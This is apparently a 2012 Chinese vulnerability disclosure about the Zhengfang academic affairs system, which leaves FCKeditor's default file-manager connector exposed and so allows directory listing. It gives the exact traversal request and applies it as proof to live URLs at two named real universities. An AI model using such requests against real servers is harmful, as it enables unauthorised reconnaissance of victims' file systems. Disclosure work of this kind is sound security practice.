正方软件教务系统fckeditor漏洞测试

漏洞详情

披露状态：

2012-06-16： 细节已通知厂商并且等待厂商处理中
2012-06-19： 厂商已经确认，细节仅向厂商公开
2012-06-29： 细节向核心白帽子及相关领域专家公开
2012-07-09： 细节向普通白帽子公开
2012-07-19： 细节向实习白帽子公开
2012-08-03： 细节向公众公开

简要描述：

方正教务系统使用了fckeditor编辑器，没有修改其默认上传接口，导致任意文件遍历问题

详细说明：

fckeditor为了方正系统根目录的fckeditor文件夹中，调用默认的connectors接口即可遍历文件，即访问
/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=d:/
可以获取d盘文件信息

漏洞证明：

以上海理工大学为例
地址：http://jwc1.usst.edu.cn/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=d:/
截图：


成都理工大学
地址：http://110.189.108.7/(22x10355pp4ki0iphyprakbd)/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=d:/

更多信息来自东方联盟网：http://www.vm888.com